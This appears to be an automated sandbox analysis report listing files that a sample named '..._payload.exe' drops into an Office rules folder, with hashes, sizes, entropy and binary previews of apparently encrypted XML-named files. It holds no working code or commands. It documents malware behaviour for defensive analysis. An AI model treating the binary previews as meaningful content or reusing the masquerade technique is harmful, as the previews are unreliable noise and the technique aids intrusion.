                                                                                                      SHA1:A9687A892BC0EB6699784E6D377D1683E553B777
                                                                                                      SHA-256:19960016F77B30B69D62014DD2645C45222C08F2BEAFD4FEAAF63B6A799F3799
                                                                                                      SHA-512:ADBDEB2E8BBCFECD5E5AB4C3BE5DF2EACADA10B05103FAC0A1A96AB33A5FEB2DE692E7D4309E5DFB1683C9D22C293373BD7AA386D17924BE1007341D9200A2CB
                                                                                                      Malicious:false
                                                                                                      Preview:<RuleT.L...M;M<....I.y.r.R...|~....n.O.A]Z..M.\..R..thx!..#..g.........E.L.L....AS............]N,.T.^].1D+A#.{..6p.L.P.....u~.Z..Z+4'Yd."..l.. ..pcr2.4G`(.d..2\..<.._.b..r.y.."...l..;;..>z.@.th...m....sZ...8.>.~.P..s......3..m..o.._...-...+..._r..'Zf.{..d.8.......P.S.5R.a..,....k{_.|..KL.LI_...|..V.El..w...6.9E....#......w|"..#.*...S.b..?..../X.<....?N....K......`B..........r..5{........*..9re...).....\..2..5..*...r9C.8}wLG......r.op.A..F.Q!,O\....LC...A."..I.~.......D%.{.......&t....X..:.D+6.7....I..}.....+.=. ..q..r.a..>.8.-t.Y....J.'.....9<...hd...X&....n..{`....U..M>'4q...)g..N3]T.". ....x..|U.l3...)..2.$..D....Q#+.s.......L......X...i.x.!.\...o...;\.g1y./.[`....?...R..@.8V4.<;.l.`K .e.x.5.2,.v...Y..\..r'~).m.......u......S14...../}Ykp..la.$.,.2t..............e..'.3.]..F.Dh....D.XWk..S..Qj...9K..)...X.vj..F..d..|].M...%....5.0G-'...B.4...Ti...Y.O|.J...j..8.xL.U ........5Nd......DK....].S5.w.|.S...%.X..`-.|...........'...Z.9....d37X...f..|.JW.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700500v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1701
                                                                                                      Entropy (8bit):7.8793877229164595
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:+pTafpWI1SNHyzxnoIzx4ghRDC4gkP64vj75PLvfePPwD:+pTafiNHyzOOhA4Jhj75jePk
                                                                                                      MD5:74A6FECBCDBD0E384181FDA96A998C14
                                                                                                      SHA1:A0AFA82A0CDC10D8B1EB295D09FE8FB758F96EC6
                                                                                                      SHA-256:7F97C86D06473E67B581AF69944503199195C83189F40DE224AB7E58584E5015
                                                                                                      SHA-512:80AFA2DA95BD6417186AC6DE741E3AB13B289D49DA7729EB56D2453E398828451363BBDAF0D580BBE86B9605E4413AF03E7EA1853D8A356609A057B0F5DE6CF2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...U.. .8.c.<..k.......^k%..C..P.......@q........4.Y....9#..k......K.|......1f.Eb..a$|.<.ZW.2.B.-.8..W..Oh..r.X.i=. ..-..(.~.Y.o...-d)...o..e...2~...fW.6z...E4..D.k.N>.o..X@..9....Lff...&?..?0.:.h^?...=}.S.V..$O..X..>.q..s3..7..7a7.1....[`f*.|........8.(.0..vG.y.......0T]/...r.....8.........x....R.n}.p>.#..y+..LIM=.. A...l..."~.}..O..p.X.K~<.7.T.u.I................)V...Oee.....V.Y.Ef. .......f.Y$Z.5.7.>[7.......T..a<....8M2..Nt.,....]..z....=Z....8..d.L......6c$l..X. %=...u0..z%.h}R-r..`CM...q...a^3....a....*V.u..)`.a8[.L.._S4.%.Z..>/,.>x.Z1...[~.a:Mx..t.....f.(w....N.6.^..3....].%.t.........!.]0.!...F..1....U.Z..A;.\...BXm.........hS@.k...U*#.p...\..IN.)._.3j.*..u..6.......(.duv...9.8...._d7.....n.......8zz@..M...D<c.r.\...i.xnD..X.....u...........<d...S..yJ...0..%.E.._g.,H.>....a.f.:$.@.f.l.T..1.cf.s..Ie...@.tKSL.P.....[b........S....G.%FS..H..yP..9^.........c....gS.C.S..;U.._h.aN.10.......9.. [N.C.4...Ha..v.=i.w @}......]

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700501v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1738
                                                                                                      Entropy (8bit):7.895314824723656
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:uILU4ctcoevc1jMb35ow0fE/FmtAD7TPywD:uIQ4mcoV1G5v0cmtAXTv
                                                                                                      MD5:CD0F665B270E0B987AAB8B779628A09B
                                                                                                      SHA1:A803CE96D104E3596338B225C87B8954B26EB359
                                                                                                      SHA-256:4BB35B1AB0E11A0FDE3FEDD8B97520E4EA6AF423785559E7548A0FC4A2F0D4CE
                                                                                                      SHA-512:0F7B808B7E1A1FF4492A5CC8EC49B4A9652490E886A2A2B54AC532ABEFA7FCD1F019B34418EE9565CDBD78C67CCF2ADC1EE0DC915D2B239192161E1D4BEBE220
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..\.M.E@....}c.ZdzQ....._....K.4.W..H..u.$...'...2.P. ....T..b..].%....EA.....^..?7...`..T+.s..8...N..o...4D.{...o....![m..3J1...w......eS!Y<!.3...5.#.\}0a....." .........o:.R..7....^..j_....:.C.t..g....p.v..(S..........Z.0."...E....z..(.=s..e.....>h..n.<.U9..V....y.....i.L....Jc;....n.ujne..mk...X?r...`.;.g....2....H9a....%...x.]s.a.i>....n?..."..#.1....8..C".P.o...nI.y.......L{Y.6.h.;.CH.AB....C...Cz.9.....\...EjW..Xa.IX....1...y.....0d...........=....w..jAl....n....U...{p.......^..Y.(...p.1X3.B...4....El..-k?._.^f....sx.G.d8..K...'zT\sI.y...........}w..R..*.s[v.S..x.1....~..../.}.........L...Kk.....}.-I..P..).9.3.d..O...j.fu..~..".M.1sA.n..hS....._.,..T.#.Y|v.]S...^..}j.h.<..n.m.Zc............;..B.}J..4...Bhfj..".}.0E~..q..<Z.....p."X.VI:.^^...0.]...._[..p...5.....8....$..E.\Io'..r..!.`...M.h..%._..gz.K.!.. ^{Qc........T..L.Fl...}..o...1...8..2.A..n.....qZ3.-3.......bY.!../.*.m..g(.p_..EJ.kXu._.......p...p^K.k.Xz..8..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700550v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1689
                                                                                                      Entropy (8bit):7.8751896468194795
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:IpNVupviQAXVyMYKhfAIFTCqQ4gdrakpfvi3byZVRwD:ikdlcdeIF9zYakpfv0byq
                                                                                                      MD5:4E7B23E58DEED4F518947C445CC93807
                                                                                                      SHA1:4B48BEE776E7B682F7F0954E843AEBE89227EADB
                                                                                                      SHA-256:B56FD9ECDC8EEDCB11B1AED0E2A206A66D705378576758A7A4B18984997303A0
                                                                                                      SHA-512:B2B3293BBE66536B98FDF7AD1AACFD78DC89B22AE890B6AD91BA72C41D4C3416FB36FC1C2785E4CD6A469BF38C6B64E29D4CD0CCFBAD757D62D670E33E125D07
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.V.l...K.....y8..U..Zw....j...pPj[E......4..#....F}).....%..Kx..i&d.......*.g~p'..y.b...!}9.-D..c%....W.......T.....v..:+B....].z..^e|.b.......f.aP.s....0!.3A..j....yS..t..9{.'^..~.K...8....H..J$'./......<.~..........HL.ZI....Q..!~..o.. D..1.K.\...@S..y..n...R]..9...n....]...x.BY......Q..0.S......|..&.'.......T...;.A>`s... QRp`].W.IH\..!.F...x..h......u....p..n.E.>....H...v...)B@..a.=u.T....QF.%.1$.ikh.....{$...]J.6w.._Y^.".....l.....f.#...d1..O.d.hMz.@.%.....2..6....Y.b../...e.WhB...kV..../Gi`.O.sK...*S..(/9.>...H..y,#..q.~W...........g.q8 WD...w3..W.Ec.L......"q...W.&.9S.W...d........GS...../.6...E85......vLH...8.[...4O.S...G...7..`^lR6.... .r..-A.:O..?_.6.?Jh.C_W.k.d....B.r.w....C.F.I1.Z..E<M..\.k.S.....'.,w.2oU..^.c...>.t.*D...T.s............ .w.P.......1.O..f...B..U#.4......F.......\.H|..|+..v..C!F.>G..|..Lm1H.T.2..+.......LV.5.t...........M.b.8.&rV...}.T.B/<.v.k0...A....g.u..2.k..].3g...p.]C.T4.de..=... .%*VeA8.Y.K|..T.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700551v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1726
                                                                                                      Entropy (8bit):7.867582932497027
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tPfGtFC/sWpsqBm2PefcjbnqJGYeWFA8YYlAwD:VetF8/Kc3nqveWF1
                                                                                                      MD5:7E9C13037FBB6055FF868161D92B6B67
                                                                                                      SHA1:4F499CC7C022497F993A794E951A659282C69F40
                                                                                                      SHA-256:D2C229477C29E884EF898B43F0F6D5BC2D6B49D48C273A27DDD0AF64C9FA1682
                                                                                                      SHA-512:42A022FA311383D157B1ED5EC7D1558080B14D5D14B8A84D4B0A848F36CD9FE41456EA557DB43CEBE67C8255AFE19F9AE8E017C67B489919D608DB8DCFFB8256
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...cL.............K.(q.O.b&....:.h.......I.[*.6_MG..2....$_.8...-.p.q..).....IA(...d..k.a...lYe.<[.]>i.}.J.y.u.k..QB....n.I..+.LcPK....$..c.....}..8.x.^t......w_.x....(+.]K....^.|%...kk....J.g..FVPv......t.Q..J..R.......g.......Z.0.S....}e>.;.....n.qq.....k.&..N...`h&8Mo{V=...8.y.Qej.....i.>'ZF.....V..G.Wz).4.<..;.:.....&.}...]7....5..$.{.....DU.Inr..).S.....V}.G..A..f...`.0b.VU..h1...`.G....E. ..y1..D.z.....$P.^t..xY..h.dC.`q. .$.W..i.G..G..;...V^xWc+.Z=^K.,.y..W.j.p..G..R.g.../..?=HcbB.....y..S...5.K.Wp..c.A..SP.*5..H..G[~..,c..n!...`.kc...........t.9.....&..F'q..... $...p...|..6.JE...j.~..;..c..p.W.(,.k..........a.+YVdX..d..r]....s_.........u.n...8:.V..G..a.K.&R...K..ZC.]X.S...14a<...s...........k#.......v......u.Y..Q..8<.dY...5.:t...D|.. ....GFZ&.....z.Z@..y$s....._]K5...67...G.g.....B.@L+.1..:..f..Z.*..AF.9.X....Z...../....4..4.jf.......R..hD..}E"...^......)..a.7..B^NL}..[$...u..<.......-..z....Rg.`..K../....~S..I#.!...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700600v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1697
                                                                                                      Entropy (8bit):7.894539590241906
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:PbEUEYnOmyDzxVZ/ChRjIu8v9yfi3EO8wD:PbZ3X2pcj051F
                                                                                                      MD5:5B4C107473FF597CC450BFCF250CE5F1
                                                                                                      SHA1:05810D977B04FF1282302F6E99E13AAD9A6FD4C5
                                                                                                      SHA-256:B57C3E3476D5F557C2FA3C601AFFA3A387DB70B6ECFA2703E60C556C5B7E8788
                                                                                                      SHA-512:A680D97CDC022807F395C1C4606FA001001F9305DC1E2CDFEDE2C158AE8EFEBB8D8165BE8716B4621E0716E5B392C58BDC7FC68FCC1373A04CB840F4F5909419
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlNI....[.G.=3..L..1..Y..Ib..._I.$D.LB"2.H.Wr)....l.O..T.^...D.k.F!...nc...........8.....z.#.Bx.w5.....)....1h.Z'..v./..m4n.rI.O....hV......:..."...qt.S..tbm...g...>.....'1..;x..........:z.....T"._<G.7.W_..v@....U...'Y....."..p2...0..w.....eQ.T.h..kKD.V&..Hk.V~...,....{9...+..F.=U..(.f.9......d.e.E.v.4.+.BEO.\>....I..E..U..:.9.U(...Fg..... .1b...3&._@.......{..N{~.&r#..a.....x...v J......3....o.{...p..6....c...U..I..#........V.}^u.|..Xc.....3....Y2...S.....o.D.<e...7....?~n....x....f..I:4..u.>D.3)$..........FS....p....>....=.s.H.L.@1m~.t!m...........O...?..2.%,l......z.*...:.0T.fY....qo..K.n....P.....fB.Q.\.[.d...Q.M....?....+..r4Z..-.)./...@.,..&i......y.v.....!|.R..)f@.d}...]{....A..y...oP.\.u;;......R)........z...@.u.v...KO.S..Y...}..O...\.@.....1)..W.......#.n..s...ue.6.t.t...t....C...A.(s&.. ....w\..'.r.'N.....).... .)..;....H.4.J}.Q|mj.".c.to......2%......s.%F..,w....e.>!.BI.`t.....M..f.~.d.+t.u........"..)..]6G..e.8....&..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700601v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.8818964596670975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Z9jRUMBXG7VlkpiTLxmYPNpGS9QeZR2fqOkwD:ZUMBXGZSpinoYlpGOZRYp9
                                                                                                      MD5:E84837BA01E48562AFE986BED76E575E
                                                                                                      SHA1:FA9E9B0B9394FEE77057C2818E96E62162B55746
                                                                                                      SHA-256:9ACC52C2FF3EB25C041D2E36BA89B79F25339A2F183CC02EE6DDC4B9AA3431E4
                                                                                                      SHA-512:9FAD8A3DB5819C252FE7A36457E9824580B1E436A0A40C04746CEBDF5A9AA32B658E744125E2976612D01E8E25B2D97940933B899CB52D28781F3A2892B2694C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlL.Sqx.+.`..=u.^...K.-0..a.<h_.....I...?....5*D .QRW..m2.fd....51.u46h.7..s.....'.-.@.{%...l.d.-....R6%Y~..n...M..,.Y*............$M..L.QO...l.O...o8..(........._.XR....q........I...H.6E..J.[..Q..............G....0X].s~.m..6...0.,.q....:.K;.....]..4n.Z...h.%cz.....r,+&....c.k......G..h"C..j(.}...Mj....?.9...W6.\..,.eG...7............].#M....%...+. .*.... .....$.........K........n..b..+..Gl.-.a....|d.?.W.r....G.6....qx94.QU....e.5.}c..1ns;..ZQY..I.d..hJO..UX.....mt...#O%B#.*...-.P.x...OWu.A.-%._...D......Sb..e.;-....D......t................|;.Ap..&._P..a..?.W..3.`.t#.:.2A..b..9.Y...;o0j.j...D.2%..ezU.^.ni.!...'m....^.t..E.e.\.......y...q.m\......*2... ..Y1W%..RI7...N.....8.1......,m.........M.....U.}n...`....q....i..R(u.i..O1+`..\....iq.........]k...b*........Q.Z.Y.v........=....<.$..&.KYg!"Z.b$.@P..[...........=].3G.....Z...].k.....T.L.....-p.;0....M....+....X..].*....'.|....wa.{.}..!..A:..{n.._;..wp..\..2M..^..;$..._=.|..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700650v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1695
                                                                                                      Entropy (8bit):7.876499019987902
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:9QQ0SGlz18DU57dNq0vepl2q0bHm5ZHEC3MWHb3wD:9QAGtf57vqXfzcWHQ
                                                                                                      MD5:5B77284C793107C6A63E75BDF61AB505
                                                                                                      SHA1:21A36377AB7BA13D8CC7E1DA2D7BE2D39E55E12A
                                                                                                      SHA-256:6331814D996AE79C5CE8F5FD7B44DFC7C1D9A2635E92D40D89D9CF67A075E8C1
                                                                                                      SHA-512:C2BEC8344A88048B43E09258C92E0905191D34122336C84B9305DE9E42CCE25493A3187E71F977ADD697DB89866067A2DBBF24FEB4F335297718AC7617F26D92
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..!U"..Hx."..*t.U.<K.>j...d....'.-.)zg......s.=4D.f.:./\4.Z.A&].Y^.8..SV..."gdkY..@').o+..L....u...).v.mx.C..X,.; .l.y...4_og.+...b..4.%.....TK.3..../..RG....Mx...~....-..SMs.^.r.?......y*/n|)w..Wy../;}.8..nm\^CU...i[V..u.^...B..|G*...v.....b^H...3.....s...'.......7.n7.O)F.9aPb.....9.Q.7.......;?d...V.C.+..X..Q<..2..!.}ij.n.~Nk.B...g+.KW....R@...... .\%..2.?[.+Y.i.o... .1X.l7..B......z..i.y.E_..w'Ra...yq....$..t@../X..%..W..<t.6..]..O...]..@....?"...S.q.\k0.d.._;n..\...l.....V.y..[....9gx..d..v..U.....[.0....9..R.......%.N....K.!Fz...6J........g..$......~..?.b?A.b&.}2.h..1m...u.U4w.'........J.i..@...m.i......F.%~H.7..(.L....8#4+.9R.K.sY~eL&.....V.fW......./....{.5W.#.Q#...`N..B...O.Cg.y|.....OOv.....k.a3..#.W.#.h.J..#.x.|..yp.:....Ps...y(Dz...h'2..'..l.%.p...A...S.Q...R..U...:qS.^.7...Qx..._ .;$..N...f.y.>.K.f..T..cw%b. .:."....TY.......>k(......BU...{{.~(...+.U....u.@...d..`..&...Y.H......8.BviU...5......PbW....Z.8.14..TbF..l_.".ID..k..Z..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700651v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1732
                                                                                                      Entropy (8bit):7.870360549281353
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:GEN8zdfjhUfwi73mqnZ+7YohsHxRHjyqJF2wL/p8VIbW7czGCmtY5Pjv6bD:GgCLhBi7WSeOHxRDyqSwLxpgczG9tMwD
                                                                                                      MD5:3C90E671945443E522C037EA8CCA7CEC
                                                                                                      SHA1:91AF79DD235D715D0C73E3BB70E4F21A4881B96F
                                                                                                      SHA-256:99B0B8DA60250F14E08743B09229DA11D4943004A8C16D86E5C62A37D3FBB3F0
                                                                                                      SHA-512:6494BAA1BA93D16559E6BB21F1A3F595E28EA380FBADB6BC218749DE07F420FEBA3A56870C574100F54DD60394976A0B900248ED52C4E318CB6683611CA7F892
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.)...._..]...R=e.,....3....\'.......8.."..J.hS,?.F......G.....4..k.1...WM...D...ENh./. ...E......w..^...L.y.v...=..$pr.......F~L..n..2..c...A.P~...,...bD...O.CD.X.5..y.....t.W.....~..z.G.....\M..,.7..-...]&8...i..m[=$W._..8Ao.Y0.pLq...p...[..O.0....W.p.....E.h....P>.pS..`vQ.L..C .Q...)..;E<......ZV...P..Q.J../V\..t.8..nD.q.L...>.>.$.ii./.C.T.xU.V..T..}...U..Q.2K Dd...]...:E.D.R.&Z........\.=4..AQ.?C6.6......B......sy./..|.e......D.hk@k$i...9...!W.....<..R.i.t........L...#..U....w.\.....V....T2..!0....X..`(:.k.].E.....J..\..4..=.Nw^..."q(....M.o...z....N....= ....8..{...i..*....LM.Q.....&.c<....t..$.3..<.fS$}T....v.I....hfP.8.6f^.U.D..G.)....|......7..pV.]]|.~#P...6a..m...!..k.....dA......:...L...s.,.?8../?.(Q[..?.7..;RaI.9......3-.^;...c.K.|J...!E.35f..l..x.........5=..J{..V..J0..........?.w.q......5.....HlU..U-X$wf.J.q`c.6I.-G...!.w+^..t.uj.ad.......@Qa.{.%q.....J.]..N*..m..@'.."..;..r....SDL?...`=...s.........O.`3

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700700v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1697
                                                                                                      Entropy (8bit):7.892334752995498
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:l+zTtu/rkLDL2FgaoCA77Oe4qCa6Uc9GTc7WZQ/XG0uVppil0Mv6bD:l+Htu/+2FloCAnOexbcf4Q/7CM0MwD
                                                                                                      MD5:005372AD22B5A143072FEE5C403612F4
                                                                                                      SHA1:269BF5264E1F97D4BCAF7F7989418D44187DB0A9
                                                                                                      SHA-256:F1D2AA927A8AB291F3ED8A79760086F64DEC0012FADFF30F14E084F2BC0344C9
                                                                                                      SHA-512:BE3832613295F8BAA269B72DC233E69D14D1D189E70473768FF44A4F6F7A5C5FA4AD4876886E0CDD26F23DEB1D7E4ED99B636538C73E8E90E344AB3846E0B9DC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlZ..X..U..:.\y...^_F....c..o)...C..]...S.>._.s....#...c..E|......%.V.....|.C..@6q.F..Q...W:7..8.:._n...#.._....#q.P.,WWT.,(2........!}....of#.r..eNY..........T.....S[.#..g...7"p7s...DD.\FR..k.r.J.5m.D...I.a.._*... 7..?...ISOF.Gep....$.Z~...b.}V.;:..?..tt...~R..U}k..l...".8.I..1.=G.....w@6j......V....s/.. .....N..E'.g.&g^.......*7.b..|F.VDq...*....{W`.-..3.W..&...Z_..^.K.j...O.t.As...@...m.j..^.2...._.`A..7.`uc(..........yZ.ct.4.F....m.JW....;.S.....S.K...........*.l\.....g...b..O.W.2..U.W{e...E.L...)0....q.`.ve.......B~?9..w..z.......<...nj....8..e..Q........|~@....h..]~...Trw}Z..N..N|.......y'..'=..-..)>..Z..y.>.....1.b....m]...*.a......:LSo..7.t.b........eU....:*.ZG0...."|.;U.&.L....F.6..@..G..7..fJ.D.K.....<..~.......<..G....9J.V...*]<.4..>....x...s?........-.....~..+.V.$Tg..G....|....d..TT..h.kI..f...7:qt...:..T.......}Tm.....1....#..?..~bp<.'X..8.>.T..n.O.!..K.lW... .c...[.0...W...T..G........L....h2h.....+.I...+..'%W.F..e..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700701v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.8909183658295206
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ViGG57acoJE/BMUlZ3rkZXTSnjbriYgNTSer0nnpr5/2bfGRVyJlK6O+x9Omt4wV:Fg7atJUGR6aL4erahefGRVyF9LCrwD
                                                                                                      MD5:1B61D732588A946F80382CE574D286DD
                                                                                                      SHA1:E9526B87B5C010F95F69CFD0790017563E40C5C9
                                                                                                      SHA-256:2FC4F4C032CF557600D52F68E331167AE7241D15FB4077FE12C7B563B340070F
                                                                                                      SHA-512:7167FA15B16F322AF09AC78413DB084482E86B63BE5DFFFB428253EBE55D9B9B9BC9F1466E7A89A3EB99B2D4474B0666B44603CBE6E001D38F04AB206B0B1153
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....g]..{qR3pC..E.....s.....h..I;..T....=...y...':.\.v....s....].*.c.,...N7D..r..]._A....[.U|_....C .....i.9..~S.....';..2..q..X."..v~0U!7.k^..#9.3.1.1.~.)#..E......H...nkA`...N..B...m7....9...D...>.....S..a'../.J.@..6....*...^.....nw9;.....W...6.."..1..G.+kd?..S..../r>7c!...VH.IMC..30.....$......=h6..l....}.,t|.D.1....K.4.k5.A....7....)b.?~....y.H...:....t.39..4 .......nb...;:..W+.C.....~'.(.7.;l.jK.! $!.....b.+...q.!..K..}...aS,J.......j.D...E4...0_G.6,..\...dw.w.{/o.5|.....kf.}..n.......K.....9.z.3a.[0.:..;....D.Mz..P$.>N...~.Q.;.|9.B...R6IH.......{J.z....j..W....t-..&.QLgp..#..C.\`....|``.....i.=g.Os;.Z&'..u=u).j..T.....f.M-$.u=..Z...F..E..3@#...k..t..=l.@.:L....B...(X..R.M.....*.[R[.J<M...3......1.r..O.. ....w2..~_8.....!.d......'.g,2.-...(/6H....5..\...+!.kV.BH0YN....pe=..U.. ..].8.l<..-.)....s:..9...`.Y#J9...p...<..Zf...P. ...fn. ...p..Rv....c".8W..k...6.m/..8.....K......z.. ..r..T.&Q..m...%5-.gG=:...D......U.}-..d.9>.t{...Gr.9J-c.._

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700750v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1710
                                                                                                      Entropy (8bit):7.895587338173041
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:4rjQRQbnVz99k45V4P06zo/ROHpH3Wi0wA5VwD:4HQRQbn5H5806MsHN3QwA52
                                                                                                      MD5:85811B9656D14840421A161B07E8CD7A
                                                                                                      SHA1:1A1FF365889067656B5C99220841F949FB296A57
                                                                                                      SHA-256:6450059F583312E0B9680420FEBDC605C661A66003E50598B4A60003611DFD56
                                                                                                      SHA-512:29B912316DDEE5B7656874E544666CCED45EBE7D448175DAFF4B9A0DB5A0F40E665DCA18C9854FABB370283E2C9B7719B3B6C99BA120B63C6E938A9493F02189
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml[uT.IX.y......-b.;".j..W.....'5.....j....P,.T\....6..N...YpV(.1...o.R...n[j.$.~3W..NP...mJ.W)4:7.%...-....p{.:...Tks..A.....Ut...l....G..v..{...*........\.*27...vz....YI..0k$...)....|.`..F.PhBA...j.Z.+PN.R ...|...wF...E'm|.....e.H.......0....[......g.pWI.L...p;B..I.?....}......+...xr.%....S(..b....~.I.....:.?..Fz...../..M.9.!d.G....~...x...Xp..$A.......(`.{qww.3._}.OU..Q..bX@..$.o29..q.>jt..7kv..4.z.....\&.ty.y!..?.....%...P..\8..>00....%m.Q..@....sp..F.j%..)....O..<.._..G.....a.Y.8P..i......$/....e<K"l..7.{I.N.Prmt..=N.....r...2.7.......Y......!'3..t ......D*h9..}1...<.+{.^.(...;;f.V*.Uu45.. |.(... .J..4y.v..M....(..G.y..)^:S.=.).... D..}.~w\..W...6.:M...f..^z......E...l...S1~W....@.VxO8.-....Y.b.u\".Y..dX.....I...Wfd}r2S9 .L...J.R...*v....JV.. ..$..6.NU..ygen1.@4D....Z....^.x.3.rK..Yq...y.K.R..r.[.: .....9W6v..x..E..A..H........^?....'..>1..9.X:..7.Q..K.}J|..,g......j1/q.6..\..4i...2.:..T.....~8>ve.0%.i..n..'G......fg...v.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700751v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1747
                                                                                                      Entropy (8bit):7.8946346918290295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:9uXFBlwpSM/RVtOguCwZ4jYlwRYO8jPUSiQQReSwD:9evM5VRuCuMYO8jMS/rX
                                                                                                      MD5:46089C63EE2974420E0B7D5FA6EB4F6D
                                                                                                      SHA1:EBC83C3DB6C142D13C1D48C02B2A63F35C1D53F5
                                                                                                      SHA-256:EC7692D0581BEAE4670B2E84779E28F9A705808E67798699DEB375C5458B325F
                                                                                                      SHA-512:5FC05EEF6D775C22A1291BA636BD8B340E9582B4D9BD8FE722702EC1DE03DA672F69120026ECDDC1975A0C8032D54B04987FC02EDEDD4E1994DFB3DEE504CCAC
                                                                                                      Malicious:false
